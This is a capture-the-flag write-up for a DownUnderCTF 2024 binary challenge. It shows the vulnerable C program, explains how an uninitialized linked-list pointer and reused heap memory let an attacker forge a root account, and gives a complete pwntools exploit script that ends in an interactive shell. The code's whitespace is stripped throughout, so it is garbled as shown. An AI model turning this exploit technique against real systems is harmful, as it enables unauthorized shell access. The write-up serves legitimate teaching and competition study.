#include<stdio.h>#include<stdlib.h>#include<string.h>#include<unistd.h>#include<sys/random.h>typedefstruct{longuid;charusername[8];charpassword[8];}user_t;typedefstructuser_entryuser_entry_t;structuser_entry{user_t*user;user_entry_t*prev;user_entry_t*next;};user_entry_tuser_list;longUID=1;voidinit(){setvbuf(stdin,0,2,0);setvbuf(stdout,0,2,0);}intmenu(){intchoice;puts("1. Sign up");puts("2. Sign in");puts("3. Remove account");puts("4. Get shell");printf("> ");scanf("%d",&choice);returnchoice;}voidsign_up(){user_t*user=malloc(sizeof(user_t));user_entry_t*entry=malloc(sizeof(user_entry_t));user->uid=UID++;printf("username: ");read(0,user->username,8);printf("password: ");read(0,user->password,8);entry->user=user;user_entry_t*curr=&user_list;while(curr->next){curr=curr->next;}entry->prev=curr;curr->next=entry;}voidremove_account(intuid){user_entry_t*curr=&user_list;do{if(curr->user->uid==uid){if(curr->prev){curr->prev->next=curr->next;}if(curr->next){curr->next->prev=curr->prev;}free(curr->user);free(curr);break;}curr=curr->next;}while(curr);}longsign_in(){charusername[9]={0};charpassword[9]={0};printf("username: ");read(0,username,8);printf("password: ");read(0,password,8);user_entry_t*curr=&user_list;do{if(memcmp(curr->user->username,username,8)==0&&memcmp(curr->user->password,password,8)==0){printf("Logging in as %s\n",username);returncurr->user->uid;}curr=curr->next;}while(curr);return-1;}intmain(){init();longuid=-1;user_troot={.uid=0,.username="root",};if(getrandom(root.password,8,0)!=8){exit(1);}user_list.next=NULL;user_list.prev=NULL;user_list.user=&root;while(1){intchoice=menu();if(choice==1){sign_up();}elseif(choice==2){uid=sign_in();if(uid==-1){puts("Invalid username or password!");}}elseif(choice==3){if(uid==-1){puts("Please sign in first!");}else{remove_account(uid);uid=-1;}}elseif(choice==4){if(uid==0){system("/bin/sh");}else{puts("Please sign in as root first!");}}else{exit(1);}}}
Following indices bases system is used to avoid ambiguity. Whenever element of a collection is referenced by number, 0-based index implied.
Ie, element 0 of list [1, 2, 4, 8, 16] is 1, Element 3 is 8.
When element is reference in explanation with word (first, third...), 1-based system is implied.
Ie, first character of string Hello World! is H, fifth is o.
Solution code was redacted for readability purposes. Due to time pressure during the competition I was using a lot of one-letter variables and questionable code structure.
sign_up function sets values for user and prev fields, but it doesn't initialize value of next field. According to language specification,
value of the uninitialized variable is undeterminate. In practice, it will be the value that was in the RAM before allocation.
This value will be interpreted as address of the next entry in the list.
List traversal of the sign_in function will go to this "undeterminate" address and interpret that memory as user_entry structure.
1 2 3 4 5 6 7 8 9101112131415161718
longsign_in(){charusername[9]={0};charpassword[9]={0};printf("username: ");read(0,username,8);printf("password: ");read(0,password,8);user_entry_t*curr=&user_list;#setcurrvariabletotheheadofthelistdo{# read username and password from curr entry if(memcmp(curr->user->username,username,8)==0&&memcmp(curr->user->password,password,8)==0){printf("Logging in as %s\n",username);returncurr->user->uid;}curr=curr->next;#setcurrvariabletothenextentry}while(curr);#useofuninitializedmemory:checkifitsnotnull-continueiterationreturn-1;}
When we delete user, memory would look like:
2 user_entries with addresses 0x100000, 0x100040
2 user accounts with addresses 0x100020, 0x100060 (root, bob)
two recycled memory blocks that will be available for view allocations: 0x100080, 0x1000a0
Note that recycled memory is not zeroed out, it still contains data.
Now if we create a new user, recycled memory 0x100080 and 0x1000a0 will be reused for user account and user entry. Note that last
freed blocked in remove_account item will be used first by malloc in sign_up (LIFO, effectively swaping addresses of user_entry and user account).
This change is highlighted compared to figure 1:
As you can see on figure3, password of deleted user is used as address of the next user entry. So our plan is:
Find memory address that can be interpreted as user entry for account with id 0 and username and password that we know.
Create user account using address from step 1 as a password.
Delete the account.
Create new account, this will trigger the exploit and create new entry with uninitialized next value. It will be address we selected in step 1. Not so "undeterminate", huh?
Sign in with username and password that we got in step 1.
Step 1: scan memory
We are looking for address that points to user account structure:
PIE is disabled. This means code will be loaded always to the same addresses. This looks like the best place to look for pointer to
user account as its value will be same every time app launched.
Module entry point is 0x400000, we can see it in process mapping:
# start scan of memory at base address of the applicationmodule_start=0x400000# we only interested in readonly memory (24 bytes padding for safety as user structure is 24 bytes long)module_end=0x404000-24# iterate over memory addressesforiinrange(module_start,module_end):# read value stored at i (unpack convertes from little endian byte array into int)addr=unpack(elfexe.read(i,8))# if value i is a number in range module_start..module_end it can be interpreted as address.# Also check value that address i is pointing to, target application will treat that value as user ID.# We are looking for user ID equal to 0ifmodule_start<addr<module_endandunpack(elfexe.read(addr,8))==0:fake_root_entry=ibreak# use fake user entry that we found to calculate user account detailsfake_account_address=unpack(elfexe.read(fake_root_entry,8))# first field of user structuture is user ID 8 bytesfake_account_id=unpack(elfexe.read(fake_account_address,8))# second field (offset 8) in user structure is username 8 bytesfake_account_username=elfexe.read(fake_account_address+8,8)# third field (offset sum of length previous files 8 + 8) in user structure is password 8 bytesfake_account_password=elfexe.read(fake_account_address+16,8)print(f"fake entry address {hex(fake_root_entry)}")print(f"{fake_account_id=}")print(f"fake account username {binascii.hexlify(fake_account_username)}")print(f"fake account password {binascii.hexlify(fake_account_password)}")
io.recvuntil(b"> ")# wait till target application is initializedio.sendline(b'1')# enter choice 1 - create accountio.recvuntil(b":")# wait username promptio.sendline(b"one")# enter usernameio.recvuntil(b":")# wait password promptio.sendline(pack(fake_root_entry))# send address as fake root entry as password (converting into little endian)io.recvuntil(b"> ")# wait promptio.sendline(b'2')# enter choice 2 - sign inio.recvuntil(b":")# wait username promptio.sendline(b"one")# enter usernameio.recvuntil(b":")# wait password promptio.sendline(pack(fake_root_entry))# enter passwordio.recvuntil(b"> ")# wait promptio.sendline(b'3')# enter choice 3 - remove accountio.recvuntil(b"> ")# wait promptio.sendline(b'1')# enter choice 1 - create accountio.recvuntil(b":")# wait username promptio.sendline(b"two")# enter usernameio.recvuntil(b":")# wait password promptio.sendline(b"two")# enter passwordio.recvuntil(b"> ")# wait promptio.sendline(b'2')# enter choice 2 - signupio.recvuntil(b":")# wait username prompt# enter username and password of our fake user account# note that both fields are concatenated.# if we use sendline(fake_account_username) then sendline(fake_account_password)# then first sendline would append '\n' and password wont matchio.sendline(fake_account_username+fake_account_password)io.recvuntil(b"> ")# wait promptio.sendline(b'4')# enter choice 4 - Get shell
frompwnimport*context.binary=elfexe=ELF('./app')libc=elfexe.libccontext.log_level='warn'arguments=[]ifargs['REMOTE']:remote_server='2024.ductf.dev'remote_port=30022io=remote(remote_server,remote_port)else:io=process([elfexe.path]+arguments)# start scan of memory at base address of the applicationmodule_start=0x400000# we only interested in readonly memory (16 bytes padding for safety as user structure is 24 bytes long)module_end=0x404000-24# iterate over memory addressesforiinrange(module_start,module_end):# read value stored at i (unpack convertes from little endian byte array into int)addr=unpack(elfexe.read(i,8))# if value i is address in range module_start..module_end# then read value that i is pointing to - its user ID, if user ID is 0 then we found good address# to use as fake user entryifmodule_start<addr<module_endandunpack(elfexe.read(addr,8))==0:fake_root_entry=ibreak# use fake user entry that we found calculate user account detailsfake_account_address=unpack(elfexe.read(fake_root_entry,8))fake_account_id=unpack(elfexe.read(fake_account_address,8))fake_account_username=elfexe.read(fake_account_address+8,8)fake_account_password=elfexe.read(fake_account_address+16,8)print(f"fake entry address {hex(fake_root_entry)}")print(f"{fake_account_id=}")print(f"fake account username {binascii.hexlify(fake_account_username)}")print(f"fake account password {binascii.hexlify(fake_account_password)}")io.recvuntil(b"> ")# wait till target application initialisedio.sendline(b'1')# enter choice 1 - create accountio.recvuntil(b":")# wait username promptio.sendline(b"one")# enter usernameio.recvuntil(b":")# wait password promptio.sendline(pack(fake_root_entry))# send address as fake root entry as password (converting into little endian)io.recvuntil(b"> ")# wait promptio.sendline(b'2')# enter choice 2 - sign inio.recvuntil(b":")# wait username promptio.sendline(b"one")# enter usernameio.recvuntil(b":")# wait password promptio.sendline(pack(fake_root_entry))# enter passwordio.recvuntil(b"> ")# wait promptio.sendline(b'3')# enter choice 3 - remove accountio.recvuntil(b"> ")# wait promptio.sendline(b'1')# enter choice 1 - create accountio.recvuntil(b":")# wait username promptio.sendline(b"two")# enter usernameio.recvuntil(b":")# wait password promptio.sendline(b"two")# enter passwordio.recvuntil(b"> ")# wait promptio.sendline(b'2')# enter choice 2 - signupio.recvuntil(b":")# wait username prompt# enter username and password of the fake entity that has id 0# note that both fields are concatenated.# if we use sendline(fake_account_username) then sendline(fake_account_password)# then because sendline appends '\n' it would be treated as part of password and sign in failsio.sendline(fake_account_username+fake_account_password)io.recvuntil(b"> ")# failed promptio.sendline(b'4')# enter choice 4 - Get shell# we should have remove shell now - switch to interactive modeio.interactive()io.close()